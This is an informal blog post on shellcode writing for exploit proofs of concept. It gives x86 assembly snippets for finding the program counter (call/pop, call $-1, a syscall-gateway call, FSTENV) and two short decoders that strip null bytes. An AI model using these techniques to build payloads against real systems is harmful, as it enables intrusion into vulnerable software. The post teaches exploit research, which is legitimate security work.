KISS shellcoding and exploitation

In this blog i will talk about anything and everything to do with vulnerability exploitation. This is part of the job I do for SecuriTeam’s SSD. Those that are not aware of the project its aim is to give researchers compensation for their researcher efforts, compensation of course being money not just fame and glory :)
The work I do revolves around exploits and shellcodes in those exploits that we receive. In this blog post I will focus mostly on simple problems and aspects of writing exploits, and show how I have solved some of these problems in the past.

A common sight when looking for exploitation information is complicated c-and-ugly-assembly-string exploit or shellcode.  Rather than writing up another the 287637639th exploit, I will discuss different problems and goals faced when exploiting and shellcoding.  My main focus will be explaining problems and issues often encountered and a offering simple, general approaches to a solution with an emphasis on working, easy-to-implement solutions.

Rather than building a full(“weaponized”) exploit i will go through the process of building a PoC.  Also, i may feel free to talk about some simple and effective ways of building an exploit-compilation framework.

I like to start from the beginning, but even seasoned exploiters can already prepare themselves for some surprises and twists.

SHELLCODING PRIMER

One of the main problems encountered when exploiting a vulnerability -  even if is is a simple stack overflow – is shellcode restrictions.  often, the nature of the specific vulnerability will prevent us from using specific bytes or force us to use certain combinations.  obviously, every constraint is different. let’s start with the classic  “zero-tolerance” restraint.  This means that our shellcode can not contain null bytes because it was probably originally part of a printable string.

This type of constraint is indeed a classic, text book, example, but is also a common problem in real-world shellcode writing and exploitation. This is very common in vulnerabilities surrounding textual streamds, such as html, xml, telnet and others  (Often these streams can be encoded in unicode but this creates different problems).

In the October patch-Tuesday alone we can find  that many vulnerabilities – especially those in ms09-054  - may require dealing with these limitations (when not serving a unicode-encoded webpage). This is the case with CVE-2009-2529, with some implementations of an exploit for CVE-2009-2530.  This is probably also the case for CVE-2009-2531 and many other vulnerabilities.

If you have never tackled this problem before, stop reading here, and think of  how you would solve this problem.

The answer is of course  a decoder. there are many examples of byte-substitution decoders out there written in hundreds of lines of C.
let’s see what the basic concept behind these is. We want to write code that does not concatenate any null-bytes. therefore we will obviously have to substitute the null-bytes  for something  different, or escape them. does substitution really cut it?

A quick histogram of all the code in kernel32.dll(or choose any other simple dll) shows us that some bytes tend to appear much less in code and printable data.
we can simply histogram our shellcode (use hex workshop) and choose a magic byte to replace.
[picture-histogram]

let’s see what the stages we need to take in order to decode our shellcode. I won’t talk about  OS-specific issues but they are mentioned
- find the position we are running from (aka getPC)
- deal with memory-permission issues
- rewrite our code

Locating home

Finding the position we are running from in order to be able to decode the shellcode, we must first be able to find it. unfortunately x86 does not allow direct access to eip (ia-64 does somewhat :) . we must find it indirectly. we have several methods of accomplishing this, each with benefits and drawbacks. i am already assuming no null bytes allowed.

We can use the CALL opcode, which will push our  position on to the stack

A naive method using call:
_SIMPLE_CALL_GETPC_
jmp START_GA;
@GET_ADDR:
pop edi;                // get the address that was pushed on to the stack
add edi,(@START_CODE-@RET_ADDR);   //here we calculate our needed address
jmp DECODE;
@START_GA:
call GET_ADDR;        //this will push address of @RET_ADDR on to stack. decodes as “E8FFFF… ”
@RET_ADDR:             //this address will be pushed
@END_GA:
@DECODE:
[decoder goes here]
@START_CODE

or we can use a slightly more sophisticated method:

_CALL_IN_TO_OPCODE_
@GET_ADDR:
call @AFTER_CALL- 1 (call $-1)  == “E8FFFFFFFF”
@AFTER_CALL
db  ’0xC8′
inc eax
@RET_ADDR:
pop edi
add edi,(@START_CODE-@RET_ADDR)

@END_GA:
@DECODE:
[decoder goes here ]
@START_CODE

What I did here is call in to the call opcode itself . this way the call will be to end-of-opcode-1, which will result in an opcode-encoding that does not contain null bytes, but 0xFFFFFFFF. this is because part of the opcode contains the jump distance and direction. in this case, -1. After the call an ‘dec eax’ (“FFC8″) opcode will be executed.  I could have easily executed a slightly different opcode, but this is fairly harmless, and after addein an ‘inc eax’  this will result in a fancy NOP.

Another option would be to  just use an existing function that can be called(eg. from windows using syscall gateway)
_CALL_EXISTING_FUNCTION_
xor eax,eax
push eax
add eax, 0x3E ; // this can be changed for anything which will not cause damage on specific OS. in this case ntclosefile(NULL);
mov edx,  7FFE0301 // windows “syscall gateway” pointer
dec edx
mov edx, [edx]
call edx        //this will perform an os-specific syscall
@RET_ADDR:
mov edi, [esp-4]
add edi,(@START_CODE-@RET_ADDR)
@END_GA:
@DECODE
[decoder]
@START_CODE

That’s about it for using call. another nice trick is using some fpu opcodes

fld1
FSTENV  [ESP-C] //push fpu state onto stack, including last address of last run fpu opcode. this can be replace by FSAVE/FSTENV/FXSAVW/some other?
pop edi
add edi….

A completely different approach would be to copy our code to a know place. lets choose 7FFE0410 for windows (assuming no nx-bit is present, we know space is not int use, also disregarding the fact that we cannot in reality write to this address, as it is read-only from user mode).
_COPY_THE_CODE_
mov eax, 0x7FFE0410 (7FFE0300+0×110)
[eax = shellcode_postion]
mov dword ptr [eax], 0×90909090 //NOPNOPNOPNOP – the prefect shellcode jmp/call eax

When copying a larger shellcode this will not be very compact/ in order to use string operations, we will have to getPC.  A variant of this method is the famous “seh method” , which essentially does the same, except it will use an interrupt to eventually jump to where the code was copied.

Decoding
Now that we have found our own code base- we can replace our escaped, or replaced bytes.  these are two simple – hack decoders which are easy to implement, and are good enough in many cases. These will only work if we have a byte value which does not appear in the code/data as I discussed above.

XOR_IT_ALL:

jmp START_GA
@GET_ADDR:
pop edi
add edi,(@END-@RET_ADDR)
jmp DECODE
@START_GA:
call GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER  ;smaller than 0x7f. can be done multiple times
mov al, 0xA7

@REPLACE_NEXT:
mov byte ptr bl,[edi]
xor bl,al
inc edi
mov byte ptr [edi],bl
loop @REPLACE_NEXT

@END_DECODER :
NOP
NOP
NOP
NOP
NOP
@END_CODE:

Here we xor’d the whole code with the magic byte. If this magic byte did not exist in original code, than 0×00 would not exist in encoded code. A different method:

SEARCH_AND_DESTROY:
jmp START_GA
@GET_ADDR:
pop edi
add edi,(@END-@RET_ADDR)
jmp DECODE
@START_GA:
call GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER;smaller than ox7f. can be done multiple times
cld
mov al, 0xA7
xor dl,dl

@REPLACE_NEXT:

repnz scasb
mov byte ptr [edi-1],dl
test ecx,ecx
jnz replace_next:
@END_DECODER
NOP
NOP
NOP
NOP
NOP
@END_CODE

in order to build a more robust decoder, which supports escaping, or alphanumeric encoding it is possible to write one from scratch in assembly. Skilined has written a very elegant decoder at http://skypher.com. Another option is and have a small-hack-custom-adapt decoder like the one we just wrote to decode a bigger decoder written in C.in the next upcoming post… i will show how i tried (and succeeded) in building shellcode which has gone through a process of ascii-to-unicode conversion. This shellcode will have to be written so that every second byte, and only every second byte will be a null-byte. try this at home. let me know if you have anything good.

leaving you with one more point for thought.. shellcode that will run on x86 and on x64..

Share